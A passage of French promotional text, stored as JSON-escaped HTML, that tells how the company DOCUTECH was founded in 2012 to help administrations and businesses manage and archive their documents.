en 2012, la soci\u00e9t\u00e9 DOCUTECH est port\u00e9e dans les r\u00e9flexions de son fondateur apr\u00e8s avoir constat\u00e9 \u00e0 quel point les administrations et les entreprises tant publiques que priv\u00e9es se trouvent confronter \u00e0 la probl\u00e9matique de la gestion de l\u2019information et plus sp\u00e9cifiquement de la gestion documentaire.<\/p>\n<p>En effet, lors du traitement des dossiers, les organisations \u00e9mettent, re\u00e7oivent et accumulent une masse importante de documents papier et le volume de flux d\u2019informations et de documents \u00e0 g\u00e9rer est vite exponentiel en entreprise.<\/p>\n<p>Toutefois, seules les institutions qui accordent une attention particuli\u00e8re \u00e0 la gestion ordonn\u00e9e de son actif documentaire peuvent disposer plus rapidement et efficacement de l\u2019information de qualit\u00e9 et est \u00e0 mesure d\u2019agir ad\u00e9quatement.<\/p>\n<p>Afin de permettre \u00e0 toute institution de pouvoir b\u00e9n\u00e9ficier de cet atout, il s\u2019est demand\u00e9 comment mettre en place un syst\u00e8me de gestion qui serait faciliter l\u2019archivage, l\u2019acc\u00e8s, la consultation, la diffusion des documents et des
